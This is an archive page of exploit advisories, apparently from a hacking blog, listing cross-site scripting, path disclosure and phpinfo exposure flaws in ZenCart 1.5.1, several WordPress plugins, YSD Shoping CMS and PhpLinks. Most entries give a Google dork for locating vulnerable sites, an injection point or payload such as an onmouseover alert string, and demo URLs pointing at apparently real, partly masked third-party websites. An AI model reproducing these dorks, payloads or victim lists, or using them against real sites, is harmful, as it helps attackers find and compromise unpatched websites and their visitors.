Cross Site Scripting

ZenCart 1.5.1 Multiple Vulnerabilities

By |February 24th, 2014|

Exploit Title: ZenCart v1.5.1 – Multiple Vulnerabilities
Exploit Author: UmPire
Date: 21 Feb 2014
Vendor Homepage: https://www.zen-cart.com/
Version: 1.5.1
Tested on: Windows
Google Dork: inurl:”zc_install/index.php”

Cross Site Scripting Vulnerability
In the fourth step of installation, there are vulnerable fields.
vulnerable input: ” onmouseover=alert(/Hacked/) bad=”

Full Path Disclosure
In the third step of installation there is this vulnerability
Path_Translated = Drive:\\[WebPage-Directiory]\\[USER]\\zen\\zc_install\\index.php

Sensitive phpinfo reading
This is in this path:
http://[Host]/zen/zc_install/includes/phpinfo.php

Demo […]

Comments Off on ZenCart 1.5.1 Multiple Vulnerabilities

WordPress WP-Password Plugin XSS Vulnerability

By |February 24th, 2014|

title: WordPress WP-Password Plugin XSS Vulnerability
Author: Arash Cyber
date: 2/15/2014
Category: WebApp
Google Dork: inurl:”/wp-content/plugins/wp-password/login.php”
Tested On: Windows – Linux
Site: Attacker-Team.org

# Type: XSS Vulnerability
# Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text}
# Explaination: Copy The Dork In Google – Open A Site – Delete All Texts After login.php
Copy This Code At The End Of The Url: ?err={Your Text} – And End 😀

Demo:
-http://fukushXimaboys.com/wp-content/plugins/wp-password/login.php?err=Your Text
-http://wakayXama-jc.net/2012/wp-content/plugins/wp-password/login.php?err=Your […]

Comments Off on WordPress WP-Password Plugin XSS Vulnerability

WordPress fgallery plus Plugin Xss vulnerabilities

By |October 10th, 2013|

Exploit Title : WordPress fgallery plus Plugin Xss vulnerabilities
Author : Iranian Exploit DataBase
Discovered By : IeDb
Email : [email protected]
Home : http://iedb.ir – http://iedb.ir/acc
Software Link : http://wordpress.org/
Security Risk : High
Tested on : Linux
Dork : inurl:/plugins/fgallery_plus/
Exploit :
http://sXXom/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]
Dem0 :

http://alXXdk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3[xss]
http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3[xss]
Tnx To : TaK.FaNaR – l4tr0d3ctism – r3d_s0urc3 – Bl4ck M4n – Medrik – Dj.TiniVini –
dr.koderz – z3r0 – Mr Zer0
B3hz4d […]

Comments Off on WordPress fgallery plus Plugin Xss vulnerabilities

YSD Shoping CMS XSS Vulnerability

By |October 6th, 2013|

Exploit Title: YSD Shoping CMS XSS Vulnerability XSS Vulnerability In YSD Shoping CMS Date: 2013 13 September
Author: Hossein Hezami ( Dr.3v1l )
Author Email: [email protected]
Software Link: www.ysd.hk
Version: All Version
Category: webapps
Google dork : inurl:”/product_list.php?bid=” , intext:”Designed by YSD”
Tested on: Windows and Linux

Exploit :
http:///search_result.php?search_key=[XSS]
http:///product_list.php?bid=[XSS]
Demo :
www.dmXaudio.com/search_result.php?search_key=xss
www.Xom/search_result.php?search_key=xss
wwwXm/product_list.php?bid=xss
www.shoXbaby.com.hk/product_list.php?bid=xss

Comments Off on YSD Shoping CMS XSS Vulnerability

PhpLinks Cross Site Scripting Vulnerability

By |October 6th, 2013|

Exploit Title: PhpLinks Cross Site Scripting Vulnerability XSS Vulnerability In PhpLinks Date: 2013 15 September
Author: Arsan
Author email: [email protected]
Author Twitter: @ArsanBlackhat
Vendor Homepage: www.newphplinks.com
Version : All Version
Tested on: Linux & Windows
Category: webapps
Google Keywords:  inurl:”/index.php?PID=” intext:”Powered By phpLinks”

Exploit :
http://127.0.0.1:8081/index.php?PID=[XSS]
http://127.0.0.1:8081/[XSS In SearchBox]

Demo :
www.nXuth.com/index.php?PID=xss
www.eXeli.at/phplinks/index.php?PID=xss
www.ingegnXambientali.it/cercambiente/index.php?PID=xss
www.tourisXfo.it/index.php?PID=xss
www.lupuXnce-timbres.net/index.php?PID=xss
www.links.sXlbard.com/index.php?PID=xss

Comments Off on PhpLinks Cross Site Scripting Vulnerability
  • WordPress-Comment-Attachment-1.0-Cross-Site-Scripting-Vulnerability
    Permalink WordPress-Comment-Attachment-1.0-Cross-Site-Scripting-VulnerabilityGallery

    WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability

WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability

By |October 5th, 2013|

Exploit Title: WordPress Comment Attachment 1.0 Cross Site Scripting
Date: 2013 20 September
Author: Arsan
author email: [email protected]
author twitter: @ArsanBlackhat
Software Link: http://wordpress.org/plugins/comment-attachment/
Version : 1.0
Tested on: Linux & Windows
Category: webapps
Google Dork : inurl:”/comment-attachment/comment-attachment.php”
Exploit :
[-] Description :
1) Download “Comment Attachment” And Install
2) Go To Sitting Comment Attachment :
Settings > Discussion > Comment Attachment
3) Insert In “Attachment field title” This […]

Comments Off on WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability